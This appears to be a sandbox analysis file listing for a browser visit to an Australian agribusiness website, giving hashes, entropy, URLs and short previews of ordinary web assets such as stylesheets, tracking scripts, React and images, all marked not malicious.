                                                                                                                                    Preview:.PNG........IHDR.......B......g.h....pHYs.................sRGB.........gAMA......a.....IDATx..m.\....l.mR.}i.H.Mw.".._4.....-..F.*..*XP..-...b.Ei...]!.E.4.C.......|qcPL..fU..l.a...9.;...2..nv..fgg.......s....|..zy..<..C|...B.p..fA.#...<.X,...>..J%........u_..;V....h..L0!W.<}t.ww./.....@.~..j......H..vJ......~...u..'.`..l.....'o.Q..Y`..........uO.._98d....j.Xl......?...r..&...#...r.#.C.p.s...`.....!W|O].hjY....T.w.8..f.f5..Jnk.....$j.$T..6....,z......x.$.w....C.1..v...u7..;n.$S..ld....o.~_r...Z..YC0......H.p.c....b......B.Sj.z.0.......E.eI;U...7....%...PW?......C...y.R.x|....*.......T....O?...~ j..;.Vs.3F.4..pG.M.UW..hm...=K$....'...P..(.';.....|...Z....W...K.E.......\..t....?"*....M2.. l.F.......Q...k......5..\.doO7.a..Q.B.Mfl.EK.g.....\E......~0..z`#..)r}.gn.F.......y.....Xr.....N..U+..O....dG9..k.R..3....Y..fR...@..0..M.o^..!.h8...........&...!W..&....ym....75..p#....^...r..wT.........%yLy.s..k.\6r..E......j....c.0~!I.5H.;,...o~gL.m...D.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):431389
                                                                                                                                    Entropy (8bit):5.015652507780826
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:9m+gKHljgvNsEBpSZc3EJZhhnLnpje63IllFxSBtMlCpje60I4Fp0EN+vvn3XsH6:9m+zdnpje63IllFoBtMlCpje60I4Fpjs
                                                                                                                                    MD5:B12902665E7F329D47D0E56B8A41E8E6
                                                                                                                                    SHA1:355D902E04D8DAC15364D02B7DCB057004F74289
                                                                                                                                    SHA-256:B16C49D822D115D5A91DD2D48F19C46A0F3F5EEFF24050EA15062D6213F3B3D1
                                                                                                                                    SHA-512:8E416C3D971B5B6FC645A49427AFE8D1FE87D1B12E750030D0B1361EFE67E6D58C089E0B41134AA9E9965B408AB82A52D11493BB35300202995ECF9954C5A4F2
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                    Preview::root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg,hsla(0,0%,100%,.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}.youir-active{border-bottom:2px solid blue}body{-webkit-text-size-adjust:100%;-webkit-tap-highlig
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1468
                                                                                                                                    Entropy (8bit):5.804481977980605
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2jkm94/zKPccAaflSi+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6Qp:VKEcgBKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                    MD5:D5136C3BA35BD4951DD2E05D1C0D6410
                                                                                                                                    SHA1:5C0A14736FA0A45B3633DFBE1C8EFF923A9D8FF3
                                                                                                                                    SHA-256:C054EDA69ECD98E551B37886DF259580DF42AB54C0E39C3EAA04F76AB8917E12
                                                                                                                                    SHA-512:6D542EDD4AB29E6A2D145296C762D52C00095E90AAFC4EA72B33B984D0C96F1914BFE33694683F9B64762A6484DF701D6F303E8CF681668C3E0B7BFFFAE00C97
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://www.google.com/recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF
                                                                                                                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1468
                                                                                                                                    Entropy (8bit):5.804481977980605
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2jkm94/zKPccAaflSi+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/6Qp:VKEcgBKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                    MD5:D5136C3BA35BD4951DD2E05D1C0D6410
                                                                                                                                    SHA1:5C0A14736FA0A45B3633DFBE1C8EFF923A9D8FF3
                                                                                                                                    SHA-256:C054EDA69ECD98E551B37886DF259580DF42AB54C0E39C3EAA04F76AB8917E12
                                                                                                                                    SHA-512:6D542EDD4AB29E6A2D145296C762D52C00095E90AAFC4EA72B33B984D0C96F1914BFE33694683F9B64762A6484DF701D6F303E8CF681668C3E0B7BFFFAE00C97
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):67020
                                                                                                                                    Entropy (8bit):5.351351018429131
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:+zDEeJ7Yolr3DoUzaOGoKrsKPIdRMdOYkyJ+nMFvm87o6d0h2hNVRjy4MSbtzfWP:gD/9Yolr3D4M5yJ+nQveP4MSBaz
                                                                                                                                    MD5:49CDC2AA4517A0912673006E2106BA07
                                                                                                                                    SHA1:13D2AB6037F731E2D644D8D590D1D73DC82F68C7
                                                                                                                                    SHA-256:6CBFDDB4735BDCA8B4D594C0222541A0AA1F53EE6B4359647960ED164F595863
                                                                                                                                    SHA-512:98F19F2F291CD1C6D5441DB248D762CB864C7BF3F0123AFC24392CBBCEB9EE1B7803DC7577231B82623BC1A4865E98B569E5217C2F7EE276BC5E4ADB8CFD9FEB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callback(){return si},get callbacks(){return ti},get clear(){return ci},get consent(){return ui},get data(){return $r},
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (27377)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):27592
                                                                                                                                    Entropy (8bit):4.83669575258768
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                    MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                    SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                    SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                    SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-shims.min.css?token=f6136e9b49
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):93735
                                                                                                                                    Entropy (8bit):7.967524744656122
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:KDkIid4vDhgEL/O76nPSS829o8oGceeVF0CLPU22nQP7hcBgX5biHIn6gPKWZ7dH:MzFvGK/OmKSx9oXGcH0YPUK76BGCfgPb
                                                                                                                                    MD5:2A95B76DABD49B515845089D6A4880C1
                                                                                                                                    SHA1:3D31B946904E7DAAC173FAE6CD98A006AB277016
                                                                                                                                    SHA-256:A3FBCE3A38AC3CE955D5C79F085C9CA4F4691F2750F62A22A03AD9E3B7538B62
                                                                                                                                    SHA-512:52CEAF58864239C90439610D8C3B75F1BAAE5F9F8220C41A781037084E058C85B7E2AC552D117107397EE7FD23199D6B3D4C3EDA9F26CFB50D7C38E1EF55A654
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.........................................................................X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32755)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):36178
                                                                                                                                    Entropy (8bit):5.31962188524243
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:wYRKHdumNd/M2r+VVXJrk6Hx372qDgDsVKg7CUgBFmY7K:wfdu+d/76vXKSySGbK
                                                                                                                                    MD5:D8232F86C8016A8E0ACAA7ECFDF72B3E
                                                                                                                                    SHA1:C21FB1EF9E07FBF03A08C152DC0C1B755D42C475
                                                                                                                                    SHA-256:B3BCE010C0F5A7C24A82AE511194BAF67BF8C2CEE737A3A118F6B9590D322B15
                                                                                                                                    SHA-512:84685AF6B7939E75D0CDF62D370B364C1A4FF67485B8A03646E60D669B4B5A6B86E10BDB97FF466B7C8310E1F09597F517F65126B1B9979C8E3B9E5DE910BD43
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js`..function AppMeasurement(e){var t=this;t.version="2.27.0";var n,a,i=window;i.s_c_in||(i.s_c_il=[],i.s_c_in=0),t._il=i.s_c_il,t._in=i.s_c_in,t._il[t._in]=t,i.s_c_in++,t._c="s_c";try{n=i.AppMeasurement,(a=n.Cc)||(a=null)}catch(e){}var r,o,c,s=i;try{for(r=s.parent,o=s.location;r&&r.location&&o&&""+r.location!=""+o&&s.location&&""+r.location!=""+s.location&&r.location.host===o.host;)r=(s=r).parent}catch(e){}t.log=function(e){try{console.log(e)}catch(e){}},t.bb=function(e){return""+parseInt(e)==""+e},t.replace=function(e,t,n){return!e||0>e.indexOf(t)?e:e.split(t).join(n)},t.escape=function(e){var n,a;if(!e)return e;for(e=encodeURIComponent(e),n=0;7>n;n++)a="+~!*()'".substring(n,n+1),0<=e.indexOf(a)&&(e=t.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},t.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?t.replace(e,"+"," "):e;try{return de
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):705
                                                                                                                                    Entropy (8bit):7.543354064069374
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/ljgs1Xq8Fwa+SJ/1Kl69d1VG5oKanYqMwC4+pKfzeVBNAQcE:x/6Og+qwJgl69dK5bCYcCVOE
                                                                                                                                    MD5:CADBD6B75F35FF2B2E5CCF257A9975C6
                                                                                                                                    SHA1:BDB1EB15DEB30A22E4C1E2B76C61F28B64EAEB43
                                                                                                                                    SHA-256:A4B5CE886DED1D9DBF02BD1D499988306F756B0BA1CAA0CB2AF772AFDA38986C
                                                                                                                                    SHA-512:5A56C890F4AD372FE01C64F26E78DC645F6BF7AC68DFA9F95BA199A16DDE87A06D17DE46C051EA7D860964FC11C19C4149C5F824B20D9B5A3C4E9FA08E62EC35
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/facebook.png
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....VIDATx..VMn.P..yv.........#...;v..BN@9A..Jo.n....d.....f..)H%. y.<.4.......73o.{c#,.a........F@Cm%.... ..0..A....m6..C.......H.....H..ov.........".....M...>.:0M...x....?*..y}w...W.3.T....z}7...?..[.smk.....0.b.77.m...t.lZ|.NJG$...&.Z....2. g:..d..1...5.y.b..WX....s7](.W..GI.=.l/....vtD.........p.)3nE..V..!....#..f.(5..l[..V+f.SF....P"...o./U 8..w......T&N.f....@...H....a......w..=.t..E..L.,.Y..W'..s..S`..=mZq.._....y..z...Z..E".S._pO..5.K&SM..9....27....}..49.y.T[Q4..L..AR...;.C7"....$..6E.n..sN..kB..}.u...B_..pB.N.g..N.L.g.8P.JW ...w.(.m..&<.Z......V.M.#.u.kH...9P.?....jX.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):5538
                                                                                                                                    Entropy (8bit):4.855074843571827
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:9J4o/vHtcZfoRUGSA8a32BtT3lh2toLZU6KJyaz8G0Y:T1vHsfoRfSA8y2B93lh2toLZV+yaz2Y
                                                                                                                                    MD5:6ECA9F97D2E4B34F7B8C85B49887C474
                                                                                                                                    SHA1:3155098A09A2D8BAE294A044C3D82452BDDC6CBC
                                                                                                                                    SHA-256:A5C392E142DD1D80325021AD4497F87E97372DA8819D04C63EB09132D8C0EE25
                                                                                                                                    SHA-512:A86FFEFF1FF65DF109EA2CA6098B533D8D6F4BCD98A7604E247E93EDE7161B903D9B52C05F460F061E99D4573CCEC36AF94618A2BC0BAA4F7B7F2D4227FF0F55
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */..// /* eslint-disable max-classes-per-file */.(function () {. 'use strict';.. /* eslint-env browser */. function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance =
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (608)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):823
                                                                                                                                    Entropy (8bit):5.079251934712805
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                    MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                    SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                    SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                    SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v5-font-face.min.css?token=f6136e9b49
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (606)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):216447
                                                                                                                                    Entropy (8bit):5.409018806878557
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:shoDvgQdaJb0/yjuYp56xugI+8Nb7KDCP:sho0Qdd/azdxKDa
                                                                                                                                    MD5:977E7EC6E7E29A59F7DFD9CD0AC2F4B3
                                                                                                                                    SHA1:17CF9152587CD282FB0C2F3333A875DF4A4F649D
                                                                                                                                    SHA-256:C12D4667295C265EA3084DA9F4322817C09DFB5C87CA81B6C1BF7AB2F1E82EDC
                                                                                                                                    SHA-512:BBA4B9E8E44F04A7D9A23A8AF920B7499ABDEDE4E3BCC753ABAC566E1173ECC80BC4DABE312AEE224A19A26ED4A18ABB6882F15C03ED05F5CFF4CC747F859D83
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js
                                                                                                                                    Preview:/*.. Copyright (c) 2016 Federico Zivolo and contributors.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in all. copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (1352)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1080227
                                                                                                                                    Entropy (8bit):4.683413687755208
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:Eb4LcitesQOUrfhl597ZRt4f/t7EQWRWqPwiQ3YaA4gSX:Eb4LcitesQOUrfhH97ZR2FEQWRWqPwi0
                                                                                                                                    MD5:3EDF0EB850CBD3326D48DD88B6C3029F
                                                                                                                                    SHA1:AB3BD02C5322C693EBE6E824BA87141E57A3A18A
                                                                                                                                    SHA-256:F9044A5E9C39DB8BB1A204DFF924E526EC0A621E695BB69DE1035811BE8709E4
                                                                                                                                    SHA-512:51D09A415EF8CA0E2DFCFCB6EBBE0B8A4253A0103474C0623DC89CB23BD626815C832EE63589453DFD585FA876B06E17BE16AA785A30FDB32C329ED9E2152048
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**. * @license React. * react-dom.development.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('react')) :. typeof define === 'function' && define.amd ? define(['exports', 'react'], factory) :. (global = global || self, factory(global.ReactDOM = {}, global.React));.}(this, (function (exports, React) { 'use strict';.. var ReactSharedInternals = React.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED;.. var suppressWarning = false;. function setSuppressWarning(newSuppressWarning) {. {. suppressWarning = newSuppressWarning;. }. } // In DEV, calls to console.warn and console.error get replaced. // by calls to these methods by a Babel plugin.. //. // In PROD (or in packages without access to React internals),.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (553)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3681
                                                                                                                                    Entropy (8bit):5.310615162639586
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:IGUXERTgdf3nfLzeJpMJvAdFADGKCnt0gzCH9Uum33Es3PBH0Or/1mSh/F4ksiiN:BDzFHXz4M3r9LjqziiN
                                                                                                                                    MD5:011C0FC0D0CF131BDFF879743A353002
                                                                                                                                    SHA1:9336BA4F6BD99531147F284CF217D473EB6FA3C0
                                                                                                                                    SHA-256:2DBB30AF18C1CC025D432F934A8B23478A3539D525BFA6100FB097E2DCDAFE57
                                                                                                                                    SHA-512:0681C12F9DA2507D19D32CE68C2B4A6ACA9F56A8F9BCC5CF3840B1757FD15DE1EF1411069913D566D39933DA586401585DA7481F0762795CF0E4DD64A2410E00
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.externalize&&(c.url=k.externalize(c.url)),c.encodePath&&(c.url=k.encodePathOfURI(c.url)));c.hook&&(h=k.getXhrHook(c.url,c.type,c.data))&&(c.url=h.url,h.params&&("GET"===c.type.toUpperCase()?c.url+="?"+g.param(h.params):c.data=g.param(h.params)))},statusCode:{403:function(h){"Authentication Failed"===.h.getResponseHeader("X-Reason")&&k.handleLoginRedirect()}}});g.ajaxSettings.traditional=!0})(jQuery,this);.(function(g){window.Granite.csrf||(window.Granite.csrf=g(window.Granite.HTTP))})(function(g){function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.con
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 600x400, components 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):93735
                                                                                                                                    Entropy (8bit):7.967524744656122
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:KDkIid4vDhgEL/O76nPSS829o8oGceeVF0CLPU22nQP7hcBgX5biHIn6gPKWZ7dH:MzFvGK/OmKSx9oXGcH0YPUK76BGCfgPb
                                                                                                                                    MD5:2A95B76DABD49B515845089D6A4880C1
                                                                                                                                    SHA1:3D31B946904E7DAAC173FAE6CD98A006AB277016
                                                                                                                                    SHA-256:A3FBCE3A38AC3CE955D5C79F085C9CA4F4691F2750F62A22A03AD9E3B7538B62
